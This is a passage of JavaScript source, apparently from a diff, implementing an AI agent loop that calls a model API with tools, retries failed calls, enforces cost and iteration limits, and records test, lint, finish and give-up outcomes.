 * @param {function} [options.onEvent] - Receives progress events
 *   (`turn_start`, `api_retry`, `cost_limit_hit`, `thought`, `no_tools`,
 *   `tool_call`, `tool_result`, `finished`, `gave_up`, `iteration_limit`).
 * @param {number} [options.retryBaseDelayMs=1000] - Base backoff for API retries.
 * @returns {Promise<object>} `{ usage, history, finalSummary, completedTurns,
 *   stopReason, aborted, sawPassingTests, sawPassingLint, gaveUp }`.
 *   `completedTurns` is the loop counter's final value: the turn on which
 *   the loop stopped, or `maxIterations + 1` when every iteration was used.
 */
async function runAgentLoop({
  systemPrompt,
  userPrompt,
  ctx,
  maxIterations = MAX_AGENT_ITERATIONS,
  maxTokens = MAX_TURN_OUTPUT_TOKENS,
  costLimitUsd = null,
  onEvent = () => {},
  retryBaseDelayMs = 1000
}) {
  const client = new Anthropic();
  const messages = [{ role: 'user', content: userPrompt }];
  const usage = emptyUsage();
  const history = [];
  let finalSummary = null;
  let stopReason = null;
  let turn = 0;
  let aborted = null;
  let sawPassingTests = false; // flipped true when run_tests returns passed:true
  let sawPassingLint = null; // null=not run, true=passed, false=last run failed
  let gaveUp = null; // set when agent calls give_up

  for (turn = 1; turn <= maxIterations; turn++) {
    onEvent({ type: 'turn_start', turn });

    const response = await callWithRetry(
      () => client.messages.create({
        model: MODEL,
        max_tokens: maxTokens,
        tools: TOOLS,
        system: [{ type: 'text', text: systemPrompt, cache_control: { type: 'ephemeral' } }],
        messages
      }),
      {
        maxAttempts: 3,
        baseDelayMs: retryBaseDelayMs,
        onRetry: (info) => onEvent({ type: 'api_retry', turn, ...info })
      }
    );

    addUsage(usage, response.usage || {});
    stopReason = response.stop_reason;

    // The cost check runs before this turn's content is processed, so a
    // turn that crosses the limit is billed but its tool calls never run.
    if (costLimitUsd !== null) {
      const { total_usd } = computeCost(usage);
      if (total_usd > costLimitUsd) {
        onEvent({ type: 'cost_limit_hit', turn, costUsd: total_usd, limit: costLimitUsd });
        aborted = 'cost_limit';
        stopReason = 'cost_limit';
        break;
      }
    }

    const textBlocks = response.content.filter(b => b.type === 'text').map(b => b.text).join('\n').trim();
    const toolCalls = response.content.filter(b => b.type === 'tool_use');

    if (textBlocks) {
      onEvent({ type: 'thought', turn, text: textBlocks });
      history.push({ turn, kind: 'thought', text: textBlocks });
    }

    messages.push({ role: 'assistant', content: response.content });

    if (toolCalls.length === 0) {
      onEvent({ type: 'no_tools', turn, stop_reason: stopReason });
      break;
    }

    const toolResults = [];
    for (const call of toolCalls) {
      onEvent({ type: 'tool_call', turn, name: call.name, preview: previewInput(call.input) });
      const result = await dispatchToolSafely(call, ctx);
      onEvent({
        type: 'tool_result', turn, name: call.name,
        ok: result.ok, error: result.error,
        flaky: result.flaky, attempts: result.attempts
      });

      history.push({ turn, kind: 'tool', name: call.name, input: call.input, result });

      if (call.name === 'run_tests' && result.ok && result.passed) {
        sawPassingTests = true;
      }
      if (call.name === 'run_lint' && result.ok) {
        sawPassingLint = result.passed;
      }

      toolResults.push({
        type: 'tool_result',
        tool_use_id: call.id,
        content: JSON.stringify(result),
        is_error: !result.ok
      });

      if (call.name === 'finish' && result.ok) {
        finalSummary = call.input.pr_summary;
      }
      if (call.name === 'give_up' && result.ok) {
        gaveUp = {
          reason: result.reason,
          explanation: result.explanation,
          blockers: result.blockers
        };
        aborted = 'gave_up';
      }
    }

    // Every tool_use in the assistant message gets its tool_result, even on
    // the turn that ends the loop.
    messages.push({ role: 'user', content: toolResults });

    if (finalSummary) {
      onEvent({ type: 'finished', turn, summary: finalSummary });
      break;
    }
    if (gaveUp) {
      onEvent({ type: 'gave_up', turn, ...gaveUp });
      break;
    }
  }

  // turn only exceeds maxIterations when the loop ended without a break.
  if (!finalSummary && !aborted && turn > maxIterations) {
    onEvent({ type: 'iteration_limit', turn: maxIterations });
  }

  return {
    usage, history, finalSummary,
    completedTurns: turn, stopReason, aborted,
    sawPassingTests, sawPassingLint, gaveUp
  };
}
175
+
176
+ module.exports = { runAgentLoop, callWithRetry, isRetryable };